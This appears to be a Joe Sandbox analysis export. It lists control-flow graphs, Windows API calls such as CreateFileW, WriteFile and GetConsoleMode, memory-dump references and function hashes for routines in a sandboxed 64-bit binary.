                                                                                  control_flow_graph 165 7ff73a40fee8-7ff73a40ff5b call 7ff73a40facc 168 7ff73a40ff5d-7ff73a40ff66 call 7ff73a400688 165->168 169 7ff73a40ff75-7ff73a40ff7f call 7ff73a40c2fc 165->169 176 7ff73a40ff69-7ff73a40ff70 call 7ff73a4006a8 168->176 174 7ff73a40ff9a-7ff73a410003 CreateFileW 169->174 175 7ff73a40ff81-7ff73a40ff98 call 7ff73a400688 call 7ff73a4006a8 169->175 178 7ff73a410080-7ff73a41008b GetFileType 174->178 179 7ff73a410005-7ff73a41000b 174->179 175->176 192 7ff73a4102b6-7ff73a4102d6 176->192 185 7ff73a41008d-7ff73a4100c8 GetLastError call 7ff73a40061c CloseHandle 178->185 186 7ff73a4100de-7ff73a4100e5 178->186 182 7ff73a41004d-7ff73a41007b GetLastError call 7ff73a40061c 179->182 183 7ff73a41000d-7ff73a410011 179->183 182->176 183->182 190 7ff73a410013-7ff73a41004b CreateFileW 183->190 185->176 199 7ff73a4100ce-7ff73a4100d9 call 7ff73a4006a8 185->199 188 7ff73a4100e7-7ff73a4100eb 186->188 189 7ff73a4100ed-7ff73a4100f0 186->189 195 7ff73a4100f6-7ff73a41014b call 7ff73a40c214 188->195 189->195 196 7ff73a4100f2 189->196 190->178 190->182 204 7ff73a41016a-7ff73a41019b call 7ff73a40f84c 195->204 205 7ff73a41014d-7ff73a410159 call 7ff73a40fcd4 195->205 196->195 199->176 210 7ff73a41019d-7ff73a41019f 204->210 211 7ff73a4101a1-7ff73a4101e3 204->211 205->204 212 7ff73a41015b 205->212 213 7ff73a41015d-7ff73a410165 call 7ff73a405e60 210->213 214 7ff73a410205-7ff73a410210 211->214 215 7ff73a4101e5-7ff73a4101e9 211->215 212->213 213->192 217 7ff73a4102b4 214->217 218 7ff73a410216-7ff73a41021a 214->218 215->214 216 7ff73a4101eb-7ff73a410200 215->216 216->214 217->192 218->217 221 7ff73a410220-7ff73a410265 CloseHandle CreateFileW 218->221 222 7ff73a410267-7ff73a410295 GetLastError call 7ff73a40061c call 7ff73a40c43c 221->222 223 7ff73a41029a-7ff73a4102af 221->223 222->223 223->217
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                  • String ID:
                                                                                  • API String ID: 1617910340-0
                                                                                  • Opcode ID: cd617a6eb87e8d63d3f009fae8cd3b179463d396c4807aaae279dc048755ae53
                                                                                  • Instruction ID: 944ac0af9c5cfb2b5372162a4846fcd25a33061b4d462e61cb2fcda9d5dd693a
                                                                                  • Opcode Fuzzy Hash: cd617a6eb87e8d63d3f009fae8cd3b179463d396c4807aaae279dc048755ae53
                                                                                  • Instruction Fuzzy Hash: 6BC1F23BB28A4195FB10EFA9D4822ACB761F789B98F520275DE1E57394CF38D411E310

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 228 7ff73a4059e0-7ff73a405a05 229 7ff73a405cd3 228->229 230 7ff73a405a0b-7ff73a405a0e 228->230 231 7ff73a405cd5-7ff73a405ce5 229->231 232 7ff73a405a10-7ff73a405a42 call 7ff73a3ff65c 230->232 233 7ff73a405a47-7ff73a405a73 230->233 232->231 235 7ff73a405a75-7ff73a405a7c 233->235 236 7ff73a405a7e-7ff73a405a84 233->236 235->232 235->236 237 7ff73a405a86-7ff73a405a8f call 7ff73a4081bc 236->237 238 7ff73a405a94-7ff73a405aa9 call 7ff73a40ee00 236->238 237->238 243 7ff73a405bc3-7ff73a405bcc 238->243 244 7ff73a405aaf-7ff73a405ab8 238->244 245 7ff73a405c20-7ff73a405c45 WriteFile 243->245 246 7ff73a405bce-7ff73a405bd4 243->246 244->243 247 7ff73a405abe-7ff73a405ac2 244->247 248 7ff73a405c50 245->248 249 7ff73a405c47-7ff73a405c4d GetLastError 245->249 250 7ff73a405bd6-7ff73a405bd9 246->250 251 7ff73a405c0c-7ff73a405c1e call 7ff73a405498 246->251 252 7ff73a405ac4-7ff73a405acc call 7ff73a400770 247->252 253 7ff73a405ad3-7ff73a405ade 247->253 254 7ff73a405c53 248->254 249->248 255 7ff73a405bdb-7ff73a405bde 250->255 256 7ff73a405bf8-7ff73a405c0a call 7ff73a4056b8 250->256 276 7ff73a405bb0-7ff73a405bb7 251->276 252->253 258 7ff73a405ae0-7ff73a405ae9 253->258 259 7ff73a405aef-7ff73a405b04 GetConsoleMode 253->259 261 7ff73a405c58 254->261 262 7ff73a405c64-7ff73a405c6e 255->262 263 7ff73a405be4-7ff73a405bf6 call 7ff73a40559c 255->263 256->276 258->243 258->259 266 7ff73a405bbc 259->266 267 7ff73a405b0a-7ff73a405b10 259->267 269 7ff73a405c5d 261->269 270 7ff73a405c70-7ff73a405c75 262->270 271 7ff73a405ccc-7ff73a405cd1 262->271 263->276 266->243 274 7ff73a405b16-7ff73a405b19 267->274 275 7ff73a405b99-7ff73a405bab call 7ff73a405020 267->275 269->262 277 7ff73a405ca3-7ff73a405cad 270->277 278 7ff73a405c77-7ff73a405c7a 270->278 271->231 280 7ff73a405b24-7ff73a405b32 274->280 281 7ff73a405b1b-7ff73a405b1e 274->281 275->276 276->261 287 7ff73a405cb4-7ff73a405cc3 277->287 288 7ff73a405caf-7ff73a405cb2 277->288 285 7ff73a405c93-7ff73a405c9e call 7ff73a400664 278->285 286 7ff73a405c7c-7ff73a405c8b 278->286 283 7ff73a405b34 280->283 284 7ff73a405b90-7ff73a405b94 280->284 281->269 281->280 289 7ff73a405b38-7ff73a405b4f call 7ff73a40f048 283->289 284->254 285->277 286->285 287->271 288->229 288->287 294 7ff73a405b51-7ff73a405b5d 289->294 295 7ff73a405b87-7ff73a405b8d GetLastError 289->295 296 7ff73a405b5f-7ff73a405b71 call 7ff73a40f048 294->296 297 7ff73a405b7c-7ff73a405b83 294->297 295->284 296->295 301 7ff73a405b73-7ff73a405b7a 296->301 297->284 299 7ff73a405b85 297->299 299->289 301->297
                                                                                  APIs
                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF73A4059CB,?), ref: 00007FF73A405AFC
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF73A4059CB,?), ref: 00007FF73A405B87
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleErrorLastMode
                                                                                  • String ID:
                                                                                  • API String ID: 953036326-0
                                                                                  • Opcode ID: 2e72a14a40dcdbc440ab8e2dea6762219126c6135b7ef8777481cfa15dd251e3
                                                                                  • Instruction ID: 93d84f551808eff0354e09a76a203db6c7f8cb7941debcf8295b011636b0794a
                                                                                  • Opcode Fuzzy Hash: 2e72a14a40dcdbc440ab8e2dea6762219126c6135b7ef8777481cfa15dd251e3
                                                                                  • Instruction Fuzzy Hash: 649107B6E08651A5F750EF6D94412BDEBA0FB40B88F968079DE4E52684CF3CE441F722

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00007FF73A3F6AA4: GetModuleHandleW.KERNEL32(?,?,?,00007FF73A3F6D26), ref: 00007FF73A3F6ABA
                                                                                    • Part of subcall function 00007FF73A3F6AA4: GetProcAddress.KERNEL32(?,?,?,00007FF73A3F6D26), ref: 00007FF73A3F6ACA
                                                                                  • GetLastError.KERNEL32 ref: 00007FF73A3F6D30
                                                                                    • Part of subcall function 00007FF73A3FFE88: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73A3FDAC6,?,?,?,00007FF73A3FF64A), ref: 00007FF73A3FFEAE
                                                                                  • GetFileAttributesW.KERNELBASE ref: 00007FF73A3F6D3F
                                                                                  • __std_fs_open_handle.LIBCPMT ref: 00007FF73A3F6D68
                                                                                  • CloseHandle.KERNEL32 ref: 00007FF73A3F6D7A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Handle$AddressAttributesCloseErrorFeatureFileLastModulePresentProcProcessor__std_fs_open_handle
                                                                                  • String ID:
                                                                                  • API String ID: 156590933-0
                                                                                  • Opcode ID: 6a6f73d8c6b678b20650fb784add4d01299f4f483c1c765fbfb181a8c8681b05
                                                                                  • Instruction ID: 5143b97ce395f0a8fb6438d618e8cc86ff3bb772623076b254461ac6b7f92aef
                                                                                  • Opcode Fuzzy Hash: 6a6f73d8c6b678b20650fb784add4d01299f4f483c1c765fbfb181a8c8681b05
                                                                                  • Instruction Fuzzy Hash: 0611E639A2E38365FE507B26A18A13AA760DF447F0F901678F96E466E4DF3CD4406B10

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 321 7ff73a40b954-7ff73a40b987 call 7ff73a40b2b0 324 7ff73a40b98d-7ff73a40b99a 321->324 325 7ff73a40bbe1-7ff73a40bbe4 call 7ff73a40b330 321->325 327 7ff73a40b99d-7ff73a40b99f 324->327 328 7ff73a40bbe9 325->328 329 7ff73a40baeb-7ff73a40bb19 call 7ff73a412940 327->329 330 7ff73a40b9a5-7ff73a40b9b0 327->330 331 7ff73a40bbeb-7ff73a40bc10 call 7ff73a3f7e70 328->331 339 7ff73a40bb1c-7ff73a40bb22 329->339 330->327 333 7ff73a40b9b2-7ff73a40b9b8 330->333 336 7ff73a40b9be-7ff73a40b9c9 IsValidCodePage 333->336 337 7ff73a40bae3-7ff73a40bae6 333->337 336->337 340 7ff73a40b9cf-7ff73a40b9d6 336->340 337->331 341 7ff73a40bb62-7ff73a40bb6c 339->341 342 7ff73a40bb24-7ff73a40bb27 339->342 343 7ff73a40b9d8-7ff73a40b9e6 340->343 344 7ff73a40b9fe-7ff73a40ba0d GetCPInfo 340->344 341->339 349 7ff73a40bb6e-7ff73a40bb7a 341->349 342->341 345 7ff73a40bb29-7ff73a40bb34 342->345 346 7ff73a40b9ea-7ff73a40b9f9 343->346 347 7ff73a40bad7-7ff73a40badd 344->347 348 7ff73a40ba13-7ff73a40ba33 call 7ff73a412940 344->348 350 7ff73a40bb5a-7ff73a40bb60 345->350 351 7ff73a40bb36 345->351 352 7ff73a40bbd7-7ff73a40bbda call 7ff73a40b3c8 346->352 347->325 347->337 364 7ff73a40ba39-7ff73a40ba42 348->364 365 7ff73a40bacd 348->365 354 7ff73a40bb7c-7ff73a40bb7f 349->354 355 7ff73a40bba5 349->355 350->341 350->342 357 7ff73a40bb3a-7ff73a40bb41 351->357 362 7ff73a40bbdf 352->362 359 7ff73a40bb9c-7ff73a40bba3 354->359 360 7ff73a40bb81-7ff73a40bb84 354->360 361 7ff73a40bbac-7ff73a40bbbf 355->361 357->350 363 7ff73a40bb43-7ff73a40bb58 357->363 359->361 366 7ff73a40bb93-7ff73a40bb9a 360->366 367 7ff73a40bb86-7ff73a40bb88 360->367 368 7ff73a40bbc4-7ff73a40bbd5 361->368 362->328 363->350 363->357 369 7ff73a40ba70-7ff73a40ba74 364->369 370 7ff73a40ba44-7ff73a40ba47 364->370 371 7ff73a40bacf-7ff73a40bad2 365->371 366->361 367->361 372 7ff73a40bb8a-7ff73a40bb91 367->372 368->352 368->368 374 7ff73a40ba79-7ff73a40ba82 369->374 370->369 373 7ff73a40ba49-7ff73a40ba52 370->373 371->346 372->361 375 7ff73a40ba68-7ff73a40ba6e 373->375 376 7ff73a40ba54-7ff73a40ba59 373->376 374->374 377 7ff73a40ba84-7ff73a40ba8d 374->377 375->369 375->370 378 7ff73a40ba5c-7ff73a40ba66 376->378 379 7ff73a40babd 377->379 380 7ff73a40ba8f-7ff73a40ba92 377->380 378->375 378->378 381 7ff73a40bac4-7ff73a40bacb 379->381 382 7ff73a40bab4-7ff73a40babb 380->382 383 7ff73a40ba94-7ff73a40ba97 380->383 381->371 382->381 384 7ff73a40ba99-7ff73a40ba9b 383->384 385 7ff73a40baab-7ff73a40bab2 383->385 386 7ff73a40ba9d-7ff73a40baa0 384->386 387 7ff73a40baa2-7ff73a40baa9 384->387 385->381 386->381 387->381
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF73A40B2B0: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF73A40B5EC), ref: 00007FF73A40B2DA
                                                                                  • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF73A40B71D), ref: 00007FF73A40B9C1
                                                                                  • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF73A40B71D), ref: 00007FF73A40BA05
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CodeInfoPageValid
                                                                                  • String ID: |~fqVG
                                                                                  • API String ID: 546120528-3303519982
                                                                                  • Opcode ID: 916d5d2bc06a167e78101b3390dc758e90f4b9f264f232b53cd73e79dafd9626
                                                                                  • Instruction ID: 003a878b6f7c1664675704e070557c5ad85e1c28fd834608150506154a38ba12
                                                                                  • Opcode Fuzzy Hash: 916d5d2bc06a167e78101b3390dc758e90f4b9f264f232b53cd73e79dafd9626
                                                                                  • Instruction Fuzzy Hash: 4B81486AE0C28262F725EF2DD402179F7A1EB40744FDA41B2C68D07694DE3CE542F72A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $|~fqVG
                                                                                  • API String ID: 1807457897-3531847677
                                                                                  • Opcode ID: 875b9b8a40c284ead772abb435dc8a77a384c0ab268c76e74828773d368971c8
                                                                                  • Instruction ID: 91f9a0fcfa5aad508581f46ab729e8bc6a6f3c700b11a967c3f3241f2eee4377
                                                                                  • Opcode Fuzzy Hash: 875b9b8a40c284ead772abb435dc8a77a384c0ab268c76e74828773d368971c8
                                                                                  • Instruction Fuzzy Hash: 0751BF76A1C2C19AE720DF28E0453ADFBA0F74874CF9441B6D68D83A86CB3CD506EB15

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: String
                                                                                  • String ID: LCMapStringEx
                                                                                  • API String ID: 2568140703-3893581201
                                                                                  • Opcode ID: 5eb25842227b41f3442d1bf3edcfa990ab72379bd8bedd3bb851ce65e1ed33bf
                                                                                  • Instruction ID: d300f4db13f4d4f3fda2cf492198e498b602fb7f3bf6a1709e6a268dafd4c476
                                                                                  • Opcode Fuzzy Hash: 5eb25842227b41f3442d1bf3edcfa990ab72379bd8bedd3bb851ce65e1ed33bf
                                                                                  • Instruction Fuzzy Hash: B2214C39608B8186E764DF0AB84029AF3A4FBC9BC0F948136EE8D43B19DF3CD4409B40

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                  • String ID:
                                                                                  • API String ID: 3251591375-0
                                                                                  • Opcode ID: 474476ee4c044e0c2c7cf4e5ef395ad6e649675cc114b0a31db13de272242a06
                                                                                  • Instruction ID: e00dd1e5a2b739c7f8a8faa99d36f1dabaf9a4eeea5fa04621b7457a3f60c92c
                                                                                  • Opcode Fuzzy Hash: 474476ee4c044e0c2c7cf4e5ef395ad6e649675cc114b0a31db13de272242a06
                                                                                  • Instruction Fuzzy Hash: 2E315D2CA2E24776FE58BB68A4532B9D291DF51384FD500B9E90D472E3DE3CA814B231

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bfb8fcdb40f2f7925395933c2a075e9459ae5b876a5129538ed71287851db8a9
                                                                                  • Instruction ID: 93082052af06c6768494594906467a2153ae77dc8e0ff4571e73143eaaab8a7d
                                                                                  • Opcode Fuzzy Hash: bfb8fcdb40f2f7925395933c2a075e9459ae5b876a5129538ed71287851db8a9
                                                                                  • Instruction Fuzzy Hash: F5214826B1B74765FE247B11B4063B893509F047E4FD80678EE6D077C6DE3CA482A320

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                  • String ID:
                                                                                  • API String ID: 3548387204-0
                                                                                  • Opcode ID: d1173a7212cc43d76dbf22b13eebf2488d25545fb6af3f24d076bbedaddb7772
                                                                                  • Instruction ID: d37991c3af3efe8ddc7853c5fe213f423bc7e667cee09599f6cec5422aa1f8da
                                                                                  • Opcode Fuzzy Hash: d1173a7212cc43d76dbf22b13eebf2488d25545fb6af3f24d076bbedaddb7772
                                                                                  • Instruction Fuzzy Hash: F2116D18E2E20761FE58B7B954572F9C5858FA0340FC104F9E90D862C3EE3CB9617272

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1173176844-0
                                                                                  • Opcode ID: cbf22f8cbf1717a2694491ed3b26a85d012a5bbbbd9548570d24cff125468d79
                                                                                  • Instruction ID: c14d07dd1bdf9f9c7754134af2e26de0989b4672922a06c5eab8d1f0210937d5
                                                                                  • Opcode Fuzzy Hash: cbf22f8cbf1717a2694491ed3b26a85d012a5bbbbd9548570d24cff125468d79
                                                                                  • Instruction Fuzzy Hash: 83E0EC08E2B20731FE58716524070B481444F6A370EA81BB9DE7D043C7AD3CA891B130

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(?,?,?,00007FF73A405D75,?,?,00000000,00007FF73A405E2A), ref: 00007FF73A405F66
                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF73A405D75,?,?,00000000,00007FF73A405E2A), ref: 00007FF73A405F70
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseErrorHandleLast
                                                                                  • String ID:
                                                                                  • API String ID: 918212764-0
                                                                                  • Opcode ID: c1e6758c4820c8c1252858a67302dddffb3f9881a80f9013a0a9caeb96fceeeb
                                                                                  • Instruction ID: 3a7cbb45ca20f9df86c23428fbe42524033ebae550bde403dba76fc194a9e456
                                                                                  • Opcode Fuzzy Hash: c1e6758c4820c8c1252858a67302dddffb3f9881a80f9013a0a9caeb96fceeeb
                                                                                  • Instruction Fuzzy Hash: 1521D469B1868261FA50F73DA48637CD381AF84790F9682B4EA2E473C1CE6CE4417323

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: f805479e7f46c08dc78d13233d7981beb6879058a49b51030b1ad75e20a33afe
                                                                                  • Instruction ID: 958b642e0611d1f3d60cc70103fb2f52f43a69c59553af32f507a03af58d71c8
                                                                                  • Opcode Fuzzy Hash: f805479e7f46c08dc78d13233d7981beb6879058a49b51030b1ad75e20a33afe
                                                                                  • Instruction Fuzzy Hash: AE21F237A18B4296EB61EF1CD441379F6A0EB80B94F950234EA5D876D9DF3DD400EB11

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3892129159.00007FF73A3F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A3F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3892081168.00007FF73A3F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892274488.00007FF73A414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892797670.00007FF73A426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3892867027.00007FF73A429000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff73a3f0000_12.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: 9dd8857877f8d622ee8f1f9005da3086ec389f3c95e69244a29b813603ad10de
                                                                                  • Instruction ID: 11c9dc10013d469cc188cc274ceac06dd66b1b4822bb88ed14f22dcf469ee35f
                                                                                  • Opcode Fuzzy Hash: 9dd8857877f8d622ee8f1f9005da3086ec389f3c95e69244a29b813603ad10de
                                                                                  • Instruction Fuzzy Hash: 1B11D62991C682A6FF52FB1994023BDD690AFC5B80FD544B0EA8C07686CF7CE500B722
                                                                                  APIs
